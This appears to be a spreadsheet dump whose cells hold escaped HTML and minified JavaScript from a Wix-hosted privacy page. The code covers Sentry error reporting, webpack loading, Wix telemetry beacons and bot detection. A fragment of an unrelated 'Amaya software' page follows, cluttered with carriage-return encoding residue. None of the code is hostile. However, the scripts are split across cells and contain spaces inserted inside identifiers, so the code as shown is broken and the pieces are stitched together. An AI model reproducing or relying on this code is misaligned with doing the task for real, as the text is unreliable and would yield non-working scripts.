    (function(c,t,u,n,p,l,y,z,v){if(c[l] &amp;&amp; c[l].mute) {return;}function e(b){if(!w){w=!0;var d=t.getElementsByTagName(u)[0],a=t.createElement(u);a.src=z;a.crossorigin="anonymous";a.addEventListener("load",function(){try{c[n]=q;c[p]=r;var a=c[l],d=a.init;a.init=function(a){for(var b in a)Object.prototype.hasOwnProperty.call(a,b)&amp;&amp;(v[b]=a[b]);d(v)};B(b,a)}catch(A){console.error(A)}});d.parentNode.insertBefore(a,d)}}function B(b,d){try{for(var a=0;a&lt;b.length;a++)if("function"===typeof b[a])b[a]();var f=m.data,g=!1,h=!1;for(a=0;a&lt;f.length;a++)if(f[a].f){h=!0;var e=f[a];!1===g&amp;&amp;"init"!==e.f&amp;&amp;d.init();g=!0;d[e.f].apply(d,e.a)}!1===h&amp;&amp;d.init();var k=c[n],l=c[p];for(a=0;a&lt;f.length;a++)f[a].e&amp;&amp;k?k.apply(c,f[a].e):f[a].p&amp;&amp;l&amp;&amp;l.apply(c,[f[a].p])}catch(C){console.error(C)}}for(var g=!0,x=!1,k=0;k&lt;document.scripts.length;k++)if(-1&lt;document.scripts[k].src.indexOf(y)){g="no"!==document.scripts[k].getAttribute("data-lazy");break}var w=!1,h=[],m=function(b){(b.e||b.p||b.f&amp;&amp;-1&lt;b.f.indexOf("capture")||b.f&amp;&amp;-1&lt;b.f.indexOf("showReportDialog"))&amp;&amp;g&amp;&amp;e(h);m.data.push(b)};m.data=[];c[l]={onLoad:function(b){h.push(b);g&amp;&amp;!x||e(h)},forceLoad:function(){x=!0;g&amp;&amp;setTimeout(function(){e(h)})}};"init addBreadcrumb captureMessage captureException captureEvent configureScope withScope showReportDialog".split(" ").forEach(function(b){c[l][b]=function(){m({f:b,a:arguments})}});var q=c[n];c[n]=function(b,d,a,f,e){m({e:[].slice.call(arguments)});q&amp;&amp;q.apply(c,arguments)};var r=c[p];c[p]=function(b){m({p:b.reason});r&amp;&amp;r.apply(c,arguments)};g||setTimeout(function(){e(h)})})(window,document,"script","onerror","onunhandledrejection","Sentry","605a7baede844d278b89dc95ae0a9123","https://browser.sentry-cdn.com/6.18.2/bundle.min.js",{"dsn":"https://605a7baede844d278b89dc95ae0a9123@sentry-next.wixpress.com/68"});
  &lt;/script&gt;
  &lt;!-- sendFedopsLoadStarted.inline --&gt;
  &lt;script type="application/json" id="wix-fedops"&gt;{"data":{"site":{"metaSiteId":"20eb39d3-47e6-4121-b619-91bf3c32c0b6","userId":"909c40a5-df98-4cdd-8e99-e5e027eb6606","siteId":"60afa950-bde8-4f86-8adb-43a633ca9e8b","externalBaseUrl":"https:\/\/www.arxploring.com","siteRevision":100,"siteType":"UGC","dc":"42","isResponsive":false,"sessionId":"d385f60d-d6cf-45d3-b3f4-57561d12d02e"},"rollout":{"siteAssetsVersionsRollout":false,"isDACRollout":0,"isTBRollout":false},"fleetConfig":{"fleetName":"thunderbolt-renderer-light","type":"GA","code":0},"requestUrl":"https:\/\/www.arxploring.com\/privacy","isInSEO":false,"platformOnSite":true}}&lt;/script&gt;
  &lt;script&gt;window.fedops = JSON.parse(document.getElementById('wix-fedops').textContent)&lt;/script&gt;
  &lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/webpack-runtime.b6f9a4ea.bundle.min.js"&gt;!function(){"use strict";var e,n,a,t,r,o={},i={};function d(e){var n=i[e];if(void 0!==n)return n.exports;var a=i[e]={id:e,loaded:!1,exports:{}};return o[e].call(a.exports,a,a.exports,d),a.loaded=!0,a.exports}d.m=o,e=[],d.</t>
  </si>
  <si>
    <t>O=function(n,a,t,r){if(!a){var o=1/0;for(u=0;u&lt;e.length;u++){a=e[u][0],t=e[u][1],r=e[u][2];for(var i=!0,s=0;s&lt;a.length;s++)(!1&amp;r||o&gt;=r)&amp;&amp;Object.keys(d. O).every((function(e){return d.O[e](a[s])}))?a.splice(s--,1):(i=!1,r&lt;o&amp;&amp;(o=r));if(i){e.splice(u--,1);var c=t();void 0!==c&amp;&amp;(n=c)}}return n}r=r||0;for(var u=e.length;u&gt;0&amp;&amp;e[u-1][2]&gt;r;u--)e[u]=e[u-1];e[u]=[a,t,r]},d.n=function(e){var n=e&amp;&amp;e.__esModule?function(){return e.default}:function(){return e};return d.d(n,{a:n}),n},a=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},d.t=function(e,t){if(1&amp;t&amp;&amp;(e=this(e)),8&amp;t)return e;if("object"==typeof e&amp;&amp;e){if(4&amp;t&amp;&amp;e.__esModule)return e;if(16&amp;t&amp;&amp;"function"==typeof e.then)return e}var r</t>
  </si>
  <si>
    <t>"+{233:"3fc73946",1344:"2b7b96dd",1407:"52dc3d33",1475:"edad7c2d",2262:"7e7f441d",3973:"9abcda74",4102:"34a92bc1",5246:"6dbffa0c",8138:"0a2601ec",8389:"fb1e5320",9279:"2b93f1ca",9941:"0f6643a8"}[e]+".chunk.min.css"},d.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),d.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t={},r="_wix_thunderbolt_app:",d.l=function(e,n,a,o){if(t[e])t[e].push(n);else{var i,s;if(void 0!==a)for(var c=document.getElementsByTagName("script"),u=0;u&lt;c.length;u++){var f=c[u];if(f.getAttribute("src")==e||f.getAttribute("data-webpack")==r+a){i=f;break}}i||(s=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,d.nc&amp;&amp;i.setAttribute("nonce",d.nc),i.setAttribute("data-webpack",r+a),i.src=e,0!==i.src.indexOf(window.location.origin+"/")&amp;&amp;(i.crossOrigin="anonymous")),t[e]=[n];var l=function(n,a){i.onerror=i.onload=null,clearTimeout(p);var r=t[e];if(delete t[e],i.parentNode&amp;&amp;i.parentNode.removeChild(i),r&amp;&amp;r.forEach((function(e){return e(a)})),n)return n(a)},p=setTimeout(l.bind(null,void 0,{type:"timeout",target:i}),12e4);i.onerror=l.bind(null,i.onerror),i.onload=l.bind(null,i.onload),s&amp;&amp;document.head.appendChild(i)}},d.r=function(e){"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},d.nmd=function(e){return e.paths=[],e.children||(e.children=[]),e},d.p="https://static.parastorage.com/services/wix-thunderbolt/dist/",function(){if("undefined"!=typeof document){var e=function(e){return new Promise((function(n,a){var t=d.miniCssF(e),r=d.p+t;if(function(e,n){for(var a=document.getElementsByTagName("link"),t=0;t&lt;a.length;t++){var r=(i=a[t]).getAttribute("data-href")||i.getAttribute("href");if("stylesheet"===i.rel&amp;&amp;(r===e||r===n))return i}var o=document.getElementsByTagName("style");for(t=0;t&lt;o.length;t++){var i;if((r=(i=o[t]).getAttribute("data-href"))===e||r===n)return i}}(t,r))return n();!function(e,n,a,t,r){var o=document.createElement("link");o.rel="stylesheet",o.type="text/css",o.onerror=o.onload=function(a){if(o.onerror=o.onload=null,"load"===a.type)t();else{var i=a&amp;&amp;("load"===a.type?"missing":a.type),d=a&amp;&amp;a.target&amp;&amp;a.target.href||n,s=new Error("Loading CSS chunk "+e+" failed.\n("+d+")");s.code="CSS_CHUNK_LOAD_FAILED",s.type=i,s.request=d,o.parentNode.removeChild(o),r(s)}},o.href=n,0!==o.href.indexOf(window.location.origin+"/")&amp;&amp;(o.crossOrigin="anonymous"),a?a.parentNode.insertBefore(o,a.nextSibling):document.head.appendChild(o)}(e,r,null,n,a)}))},n={6658:0};d.f.miniCss=function(a,t){n[a]?t.push(n[a]):0!==n[a]&amp;&amp;{233:1,1344:1,1407:1,1475:1,2081:1,2262:1,3973:1,4102:1,5246:1,8138:1,8389:1,9279:1,9941:1}[a]&amp;&amp;t.push(n[a]=e(a).then((function(){n[a]=0}),(function(e){throw delete n[a],e})))}}}(),function(){var e={6658:0};d.f.j=function(n,a){var t=d.o(e,n)?e[n]:void 0;if(0!==t)if(t)a.push(t[2]);else if(6658!=n){var r=new Promise((function(a,r){t=e[n]=[a,r]}));a.push(t[2]=r);var o=d.p+d.u(n),i=new Error;d.l(o,(function(a){if(d.o(e,n)&amp;&amp;(0!==(t=e[n])&amp;&amp;(e[n]=void 0),t)){var r=a&amp;&amp;("load"===a.type?"missing":a.type),o=a&amp;&amp;a.target&amp;&amp;a.target.src;i.message="Loading chunk "+n+" failed.\n("+r+": "+o+")",i.name="ChunkLoadError",i.type=r,i.request=o,t[1](i)}}),"chunk-"+n,n)}else e[n]=0},d. O.j=function(n){return 0===e[n]};var n=function(n,a){var t,r,o=a[0],i=a[1],s=a[2],c=0;if(o.some((function(n){return 0!==e[n]}))){for(t in i)d.o(i,t)&amp;&amp;(d.m[t]=i[t]);if(s)var u=s(d)}for(n&amp;&amp;n(a);c&lt;o.length;c++)r=o[c],d.o(e,r)&amp;&amp;e[r]&amp;&amp;e[r][0](),e[r]=0;return d.O(u)},a=self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[];a.forEach(n.bind(null,0)),a.push=n.bind(null,a.push.bind(a))}()}();
//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/webpack-runtime.b6f9a4ea.bundle.min.js.map&lt;/script&gt;
&lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/bi-common.inline.0cf7190a.bundle.min.js"&gt;"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[142],{19108:function(e,t,n){n.d(t,{e:function(){return v}});var i=n(82808),r=n(3575);const o=null;function s([e,t]){return t!==o&amp;&amp;`${e}=${t}`}function a(){const e=document.cookie.match(/_wixCIDX=([^;]*)/);return e&amp;&amp;e[1]}function c(e){if(!e)return o;const t=new URL(decodeURIComponent(e));return t.search="?",encodeURIComponent(t.href)}var d=function(e,{eventType:t,ts:n,tts:i,extra:r=""},d,u){var l;const p=function(e){const t=e.split("&amp;").reduce(((e,t)=&gt;{const[n,i]=t.split("=");return Object.assign(Object.assign({},e),{[n]:i})}),{});return(e,n)=&gt;void 0!==t[e]?t[e]:n}(r),m=(f=d,e=&gt;void 0===f[e]?o:f[e]);var f;let h=!0;const v=null===window||void 0===window?void 0:window.consentPolicyManager;if(v){const e=v.getCurrentConsentPolicy();if(e){const{policy:t}=e;h=!(t.functional&amp;&amp;t.analytics)}}const g=m("requestUrl"),w={src:"29",evid:"3",viewer_name:m("viewerName"),caching:m("caching"),client_id:h?o:a(),dc:m("dc"),microPop:m("microPop"),et:t,event_name:e?encodeURIComponent(e):o,is_cached:m("isCached"),is_platform_loaded:m("is_platform_loaded"),is_rollout:m("is_rollout"),ism:m("isMesh"),isp:0,isjp:m("isjp"),iss:m("isServerSide"),ssr_fb:m("fallbackReason"),ita:p("ita",d.checkVisibility()?"1":"0"),mid:h?o:(null==u?void 0:u.siteMemberId)||o,msid:m("msId"),pid:p("pid",o),pn:p("pn","1"),ref:document.referrer&amp;&amp;!h?encodeURIComponent(document.referrer):o,sar:h?o:p("sar",screen.availWidth?`${screen.availWidth}x${screen.availHeight}`:o),sessionId:h&amp;&amp;v?o:m("sessionId"),siterev:d.siteRevision||d.siteCacheRevision?`${d.siteRevision}-${d.siteCacheRevision}`:o,sr:h?o:p("sr",screen.width?`${screen.width}x${screen.height}`:o),st:m("st"),ts:n,tts:i,url:h?c(g):g,v:(null===window||void 0===window?void 0:window.thunderboltVersion)||"0.0.0",vid:h?o:(null==u?void 0:u.visitorId)||o,bsi:h?o:(null==u?void 0:u.bsi)||o,vsi:m("viewerSessionId"),wor:h||!window.outerWidth?o:`${window.outerWidth}x${window.outerHeight}`,wr:h?o:p("wr",window.innerWidth?`${window.innerWidth}x${window.innerHeight}`:o),_brandId:(null===(l=d.commonConfig)||void 0===l?void 0:l.brand)||o,nt:p("nt",o)};return`https://frog.wix.com/bt?${Object.entries(w).map(s).filter(Boolean).join("&amp;")}`},u=n(48709),l=n(20506),p=n(76491),m=n(18788);const f={WixSite:1,UGC:2,Template:3};var h=()=&gt;{const{fedops:e,viewerModel:{siteFeaturesConfigs:t,requestUrl:n,site:i,fleetConfig:r,commonConfig:o,interactionSampleRatio:s}}=window,a=(({requestUrl:e,interactionSampleRatio:t})=&gt;{const n=new URL(e).searchParams;return n.has("sampleEvents")?"true"===n.get("sampleEvents"):Math.random()&lt;(t?1-t:.9)})({requestUrl:n,interactionSampleRatio:s}),c=(0,u.</t>
  </si>
  <si>
    <t>Q)(window)||(0,p.f)()||(0,l.d)()||(({seo:e})=&gt;(null==e?void 0:e.isInSEO)?"seo":"")(t);return Object.assign(Object.assign({suppressbi:n.includes("suppressbi=true"),initialTimestamp:window.initialTimestamps.initialTimestamp,initialRequestTimestamp:window.initialTimestamps.initialRequestTimestamp,viewerSessionId:e.vsi,viewerName:i.isResponsive?"thunderbolt-responsive":"thunderbolt",siteRevision:String(i.siteRevision),msId:i.metaSiteId,is_rollout:0===r.code||1===r.code?r.code:null,is_platform_loaded:0,requestUrl:encodeURIComponent(n),sessionId:String(i.sessionId),btype:c,isjp:!!c,dc:i.dc,siteCacheRevision:"__siteCacheRevision__",checkVisibility:(()=&gt;{let e=!0;function t(){e=e&amp;&amp;!0!==document.hidden}return document.addEventListener("visibilitychange",t,{passive:!0}),t(),()=&gt;(t(),e)})()},(0,m._)(document.cookie,(()=&gt;performance.getEntriesByType("navigation")[0].serverTiming||[]))),{isMesh:1,st: f[i.siteType]||0,commonConfig:o,muteThunderboltEvents:a})};const v=function(){const e=h(),t={};let n=1;const o=(i,o,s={})=&gt;{const a=Date.now(),c=Math.round(performance.now()),u=a-e.initialTimestamp;if(function(e,t){if(t&amp;&amp;performance.mark){const n=`${t} (beat ${e})`;performance.mark(n)}}(i,o),e.suppressbi||window.__browser_deprecation__)return;const{pageId:l,pageNumber:p=n,navigationType:m}=s;let f=`&amp;pn=${p}`;l&amp;&amp;(f+=`&amp;pid=${l}`),m&amp;&amp;(f+=`&amp;nt=${m}`);const h=d(o,{eventType:i,ts:u,tts:c,extra:f},e,t);(0,r. Z)(h)};return{sendBeat:o,reportBI:function(e,t){!function(e,t){const n=t?`${e} - ${t}`:e,i="end"===t?`${e} - start`:null;performance.mark(n),performance.measure&amp;&amp;i&amp;&amp;performance.measure(`\u2b50${e}`,i,n)}(e,t)},wixBiSession:e,sendBeacon:r.Z,setDynamicSessionData:({visitorId:e,siteMemberId:n,bsi:i})=&gt;{t.visitorId=e||t.visitorId,t.siteMemberId=n||t.siteMemberId,t.bsi=i||t.bsi},reportPageNavigation:function(e){n+=1,o(i.sT.PAGE_NAVIGATION,"page navigation start",{pageId:e,pageNumber:n})},reportPageNavigationDone:function(e,t){o(i.sT.PAGE_NAVIGATION_DONE,"page navigation complete",{pageId:e,pageNumber:n,navigationType:t}),t!==i.$7.DYNAMIC_REDIRECT&amp;&amp;t!==i.$7.NAVIGATION_ERROR&amp;&amp;t!==i.$7.CANCELED||(n-=1)}}}();window.bi=v,v.sendBeat(1,"Init")},85430:function(e,t,n){var i=n(48709),r=n(76491),o=n(20506),s=n(18788);var a=n(3575);!function(){const{site:e,rollout:t,fleetConfig:n,requestUrl:c,isInSEO:d,frogOnUserDomain:u}=window.fedops.data,l=(0,i.Q)(window)||(0,r.f)()||(0,o.d)()||(d?"seo":""),p=!!l,{isCached:m,caching:f,microPop:h}=(0,s._)(document.cookie,(()=&gt;performance.getEntriesByType("navigation")[0].serverTiming||[])),v={WixSite:1,UGC:2,Template:3}[e.siteType]||0,g=e.isResponsive?"thunderbolt-responsive":"thunderbolt",{isDACRollout:w,siteAssetsVersionsRollout:b}=t,I=w?1:0,_=b?1:0,R=0===n.code||1===n.code?n.code:null,T=Date.now()-window.initialTimestamps.initialTimestamp,x=Math.round(performance.now()),{visibilityState:S}=document,N=S,{fedops:y,addEventListener:E,thunderboltVersion:A}=window;y.apps=y.apps||{},y.apps[g]={startLoadTime:x},y.sessionId=e.sessionId,y.vsi="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(e=&gt;{const t=16*Math.random()|0;return("x"===e?t:3&amp;t|8).toString(16)})),y.is_cached=m,y.phaseStarted=$(28),y.phaseEnded=$(22),performance.mark("[cache] "+f+(h?"</t>
  </si>
  <si>
    <t>["+h+"]":"")),y.reportError=e=&gt;{const t=(null==e?void 0:e.reason)||(null==e?void 0:e.message);t?C(26,`&amp;errorInfo=${t}&amp;errorType=load`):e.preventDefault()},E("error",y.reportError),E("unhandledrejection",y.reportError);let O=!1;function C(t,n=""){if(c.includes("suppressbi=true"))return;const i=(u?e.externalBaseUrl.replace(/^https?:\/\//,"")+"/_frog":"//frog.wix.com")+"/bolt-performance?src=72&amp;evid="+t+"&amp;appName="+g+"&amp;is_rollout="+R+"&amp;is_sav_rollout="+_+"&amp;is_dac_rollout="+I+"&amp;dc="+e.dc+(h?"&amp;microPop="+h:"")+"&amp;is_cached="+m+"&amp;msid="+e.metaSiteId+"&amp;session_id="+window.fedops.sessionId+"&amp;ish="+p+"&amp;isb="+p+(p?"&amp;isbr="+l:"")+"&amp;vsi="+window.fedops.vsi+"&amp;caching="+f+(O?",browser_cache":"")+"&amp;pv="+N+"&amp;pn=1&amp;v="+A+"&amp;url="+encodeURIComponent(c)+"&amp;st="+v+`&amp;ts=${T}&amp;tsn=${x}`+n;(0,a. Z)(i)}function $(e){return(t,n)=&gt;{const i=`&amp;name=${t}&amp;duration=${Date.now()-T}`,r=n&amp;&amp;n.paramsOverrides?Object.keys(n.paramsOverrides).map((e=&gt;e+"="+n.paramsOverrides[e])).join("&amp;"):"";C(e,r?`${i}&amp;${r}`:i)}}E("pageshow",(({persisted:e})=&gt;{e&amp;&amp;(O||(O=!0,y.is_cached=!0))}),!0),window.__browser_deprecation__||C(21,`&amp;platformOnSite=${window.fedops.data.platformOnSite}`)}()},70090:function(e,t,n){n.d(t,{h:function(){return o}});var i=n(47737);const r=({useBatch:e=!0,publishMethod:t=i.PublishMethods. Auto,endpoint:n,muteBi:r=!1,biStore:o,sessionManager:s,fetch:a,factory:c})=&gt;c(Object.assign({useBatch:e,publishMethod:t,endpoint:n},o.frogUrlOverride?{host:o.frogUrlOverride.replace(/^https?:\/\//,"")+"/_frog"}:{})).setMuted(r).withUoUContext({msid:o.msid}).withNonEssentialContext({visitorId:()=&gt;s.getVisitorId(),siteMemberId:()=&gt;s.getSiteMemberId()}).updateDefaults(Object.assign({vsi:o.viewerSessionId,_av:`thunderbolt-${o.viewerVersion}`,isb:o.is_headless},o.is_headless&amp;&amp;{isbr:o.is_headless_reason})),o={createBaseBiLoggerFactory:r,createBiLoggerFactoryForFedops:e=&gt;{const{biStore:{session_id:t,initialTimestamp:n,initialRequestTimestamp:i,dc:o,microPop:s,is_headless:a,isCached:c,pageData:d,rolloutData:u,caching:l,checkVisibility:p=(()=&gt;""),viewerVersion:m,requestUrl:f,st:h},muteBi:v=!1}=e;return r(Object.assign(Object.assign({},e),{muteBi:v})).updateDefaults({ts:()=&gt;Date.now()-n,tsn:()=&gt;function({initialRequestTimestamp:e}){return"undefined"==typeof window?Math.round(performance.now()+(performance.timeOrigin-e)):Math.round(performance.now())}({initialRequestTimestamp:i}),dc:o,microPop:s,caching:l,session_id:t,st:h,url:f||d.pageUrl,ish:a,pn:d.pageNumber,isFirstNavigation:1===d.pageNumber,pv:p,pageId:d.pageId,isServerSide:!1,is_lightbox:d.isLightbox,is_cached:c,is_sav_rollout:u.siteAssetsVersionsRollout?1:0,is_dac_rollout:u.isDACRollout?1:0,v:m})}}},73025:function(e,t,n){n.d(t,{b:function(){return o}});var i=n(2687),r=n(92639);const o=({biLoggerFactory:e,customParams:t={},phasesConfig:n="SEND_ON_FINISH",appName:o="thunderbolt",presetType:s=i.w.BOLT,reportBlackbox:a=!1,paramsOverrides:c={},factory:d,muteThunderboltEvents:u=!1})=&gt;{const l=d(o,{presetType:s,phasesConfig:n,isPersistent:!0,isServerSide:!1,reportBlackbox:a,customParams:t,biLoggerFactory:e,paramsOverrides:c}),{interactionStarted:p,interactionEnded:m,appLoadingPhaseStart:f,appLoadingPhaseFinish:h}=l,v=(e,t)=&gt;{const n=!!(null==t?void 0:t.appId)&amp;&amp;!r.</t>
  </si>
  <si>
    <t>Fs.has(t.appId),i=r.FD.has(e),o=r.cO.has(e);return i||n||!o&amp;&amp;!u};return l.interactionStarted=(e,...t)=&gt;{if(v(e))return p.call(l,e,...t);try{performance.mark(`${e} started`)}catch(e){}return{timeoutId:0}},l.interactionEnded=(e,...t)=&gt;{if(v(e))m.call(l,e,...t);else try{performance.mark(`${e} ended`)}catch(e){}},l.appLoadingPhaseStart=(e,t,...n)=&gt;{if(v(e,t))f.call(l,e,t,...n);else try{performance.mark(`${e} started`)}catch(e){}},l.appLoadingPhaseFinish=(e,t,...n)=&gt;{if(v(e,t))h.call(l,e,t,...n);else try{performance.mark(`${e} finished`)}catch(e){}},l}},19926:function(e,t,n){n.d(t,{y:function(){return i}});const i=e=&gt;({reportAsyncWithCustomKey:(t,n,i)=&gt;e.reportAsyncWithCustomKey(t,n,i),runAsyncAndReport:(t,n)=&gt;e.runAsyncAndReport(t,n),runAndReport:(t,n)=&gt;e.runAndReport(t,n),reportError:t=&gt;{e.captureError(t,{tags:{feature:"thunderbolt-commons",clientMetricsReporterError:!0}})},meter:t=&gt;{e.meter(t)},histogram:(e,t)=&gt;{}})},18788:function(e,t,n){n.d(t,{_:function(){return i}});const i=(e,t)=&gt;{let n,i="none",r=e.match(/ssr-caching="?cache[,#]\s*desc=([\w-]+)(?:[,#]\s*varnish=(\w+))?(?:[,#]\s*dc[,#]\s*desc=([\w-]+))?(?:"|;|$)/);if(!r&amp;&amp;window.</t>
  </si>
  <si>
    <t>PerformanceServerTiming){const e=(e=&gt;{let t,n;try{t=e()}catch(e){t=[]}const i=[];return t.forEach((e=&gt;{switch(e.name){case"cache":i[1]=e.description;break;case"varnish":i[2]=e.description;break;case"dc":n=e.description}})),{microPop:n,matches:i}})(t);n=e.microPop,r=e.matches}if(r&amp;&amp;r.length&amp;&amp;(i=`${r[1]},${r[2]||"none"}`,n||(n=r[3])),"none"===i){const e="undefined"!=typeof performance?performance.timing:null;e&amp;&amp;e.responseStart-e.requestStart==0&amp;&amp;(i="browser")}return Object.assign({caching:i,isCached:0===i.indexOf("hit")},n?{microPop:n}:{})}},69671:function(e,t,n){n.d(t,{P:function(){return r}});var i=n(43426);function r(e){return e.requestUrl.includes("wix-viewer-model=")?e.requestUrl.includes(`${i.c}=react-native`)?"thunderbolt-renderer-mobile":"thunderbolt-renderer":e.site.isResponsive?"thunderbolt-responsive":"thunderbolt"}},48709:function(e,t,n){n.d(t,{Q:function(){return i}});const i=e=&gt;{const{userAgent:t}=e.navigator;return/instagram.+google\/google/i.test(t)?"":/bot|google(?!play)|phantom|crawl|spider|headless|slurp|facebookexternal|Lighthouse|PTST|^mozilla\/4\.0$|^\s*$/i.test(t)?"ua":""}},76491:function(e,t,n){n.d(t,{f:function(){return i}});const i=()=&gt;{try{if(window.self===window.top)return""}catch(e){}return"iframe"}},20506:function(e,t,n){n.d(t,{d:function(){return i}});const i=()=&gt;{var e;if(!Function.prototype.bind)return"bind";const{document:t,navigator:n}=window;if(!t||!n)return"document";const{webdriver:i,userAgent:r,plugins:o,languages:s}=n;if(i)return"webdriver";if(!o||Array.isArray(o))return"plugins";if(null===(e=Object.getOwnPropertyDescriptor(o,"0"))||void 0===e?void 0:e.writable)return"plugins-extra";if(!r)return"userAgent";if(r.indexOf("Snapchat")&gt;0&amp;&amp;t.hidden)return"Snapchat";if(!s||0===s.length||!Object.isFrozen(s))return"languages";try{throw Error()}catch(e){if(e instanceof Error){const{stack:t}=e;if(t&amp;&amp;/ (\(internal\/)|(\(?file:\/)/.test(t))return"stack"}}return""}},3575:function(e,t,n){n.d(t,{Z:function(){return i}});const i=e=&gt;{var t,n;let i=!1;if(!((null===(t=window.viewerModel)||void 0===t?void 0:t.experiments["specs.thunderbolt.useImgNotBeacon"])||(null===(n=window.viewerModel)||void 0===n?void 0:n.experiments["specs.thunderbolt.checkIOSToAvoidBeacon"])&amp;&amp;(()=&gt;{var e;return/\(iP(hone|ad|od);/i.test(null===(e=null===window||void 0===window?void 0:window.navigator)||void 0===e?void 0:e.userAgent)})()))try{i=navigator.sendBeacon(e)}catch(e){}i||((new Image).src=e)}},37647:function(e,t,n){n.r(t),n.d(t,{createBiReporter:function(){return s},site:function(){return a}});var</t>
  </si>
  <si>
    <t>i=n(58629),r=n(69671);const o=(...e)=&gt;console.log("[TB] ",...e);function s(e=o,t=o,n=(()=&gt;{}),i=o,r=o){return{reportBI:e,sendBeat:t,setDynamicSessionData:n,reportPageNavigation:i,reportPageNavigationDone:r}}const a=({biReporter:e,wixBiSession:t,viewerModel:n})=&gt;o=&gt;{o(i.sK).toConstantValue(t),o(i.Li).toConstantValue(e),o(i.fi).toConstantValue((0,r. P)(n))}},82808:function(e,t,n){var i,r;n.d(t,{$7:function(){return r},i7:function(){return o},sT:function(){return i}}),function(e){e[e. START=1]="START",e[e.</t>
  </si>
  <si>
    <t>VISIBLE=2]="VISIBLE",e[e. PAGE_FINISH=33]="PAGE_FINISH",e[e.FIRST_CDN_RESPONSE=4]="FIRST_CDN_RESPONSE",e[e.TBD=-1]="TBD",e[e. PAGE_NAVIGATION=101]="PAGE_NAVIGATION",e[e.</t>
  </si>
  <si>
    <t>PAGE_NAVIGATION_DONE=103]="PAGE_NAVIGATION_DONE"}(i||(i={})),function(e){e[e.NAVIGATION=1]="NAVIGATION",e[e.DYNAMIC_REDIRECT=2]="DYNAMIC_REDIRECT",e[e. INNER_ROUTE=3]="INNER_ROUTE",e[e. NAVIGATION_ERROR=4]="NAVIGATION_ERROR",e[e.</t>
  </si>
  <si>
    <t>CANCELED=5]="CANCELED"}(r||(r={}));const o={1:"page-navigation",2:"page-navigation-redirect",3:"page-navigation-inner-route",4:"navigation-error",5:"navigation-canceled"}},58629:function(e,t,n){n.d(t,{Li:function(){return i},fi:function(){return o},sK:function(){return r}});const i=Symbol.for("BI"),r=Symbol.for("WixBiSessionSymbol"),o=Symbol.for("appName")}}]);
//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/bi-common.inline.0cf7190a.bundle.min.js.map&lt;/script&gt;
&lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/sendFedopsLoadStarted.inline.1c8fd250.bundle.min.js"&gt;"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5987],{},function(n){n.</t>
  </si>
  <si>
    <t>O(0,[142],(function(){return p=85430,n(n.s=p);var p}));n.O()}]);&lt;/script&gt;
  &lt;!-- Polyfills check --&gt;
  &lt;script&gt;
    if (
      typeof Promise === 'undefined' ||
      typeof Set === 'undefined' ||
      typeof Object.assign === 'undefined' ||
      typeof Array.from === 'undefined' ||
      typeof Symbol === 'undefined'
    )</t>
  </si>
  <si>
    <t>{
      // send bi in order to detect the browsers in which polyfills are not working
      window.fedops.phaseStarted('missing_polyfills')
    }
  &lt;/script&gt;
  &lt;!-- Viewer Model --&gt;
  &lt;script type="application/json" id="wix-viewer-model"&gt;{"siteAssetsTestModuleVersion":"1.334.0","requestUrl":"https:\/\/www.arxploring.com\/privacy","siteFeatures":["assetsLoader","businessLogger","captcha","commonConfig","componentsLoader","componentsRegistry","consentPolicy","cyclicTabbing","environment","lightbox","locationWixCodeSdk","navigationManager","navigationPhases","ooi","pages","renderer","reporter","router","scrollRestoration","seoWixCodeSdk","seo","sessionManager","siteMembersWixCodeSdk","siteMembers","siteScrollBlocker","siteWixCodeSdk","stores","structureApi","thunderboltInitializer","tpaCommons","translations","warmupData","windowMessageRegistrar","windowWixCodeSdk","wixEmbedsApi","componentsReact","platform"],"site":{"metaSiteId":"20eb39d3-47e6-4121-b619-91bf3c32c0b6","userId":"909c40a5-df98-4cdd-8e99-e5e027eb6606","siteId":"60afa950-bde8-4f86-8adb-43a633ca</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="UTF-8"&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;_x005F_x000D_
    &lt;title&gt;Amaya software&lt;/title&gt;_x005F_x000D_
    &lt;link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" type="text/css" href="assets/css/slick.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" type="text/css" href="assets/css/slick-theme.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" type="text/css" href="assets/css/styles.css"&gt;_x005F_x000D_
    &lt;link rel="icon" type="image/ico" sizes="32x32" href="favicon.ico"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="assets/css/style.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="assets/css/media.css"&gt;_x005F_x000D_
    &lt;script type="text/javascript" src="assets/js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script type="text/javascript" src="assets/js/automatization.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_ x000D_
&lt;body&gt;_x005F_x000D_
&lt;div class="position-relative"&gt;_x005F_x000D_
    &lt;nav class="navbar navbar-expand-lg navbar-light bg-light home navbar-privacy"&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
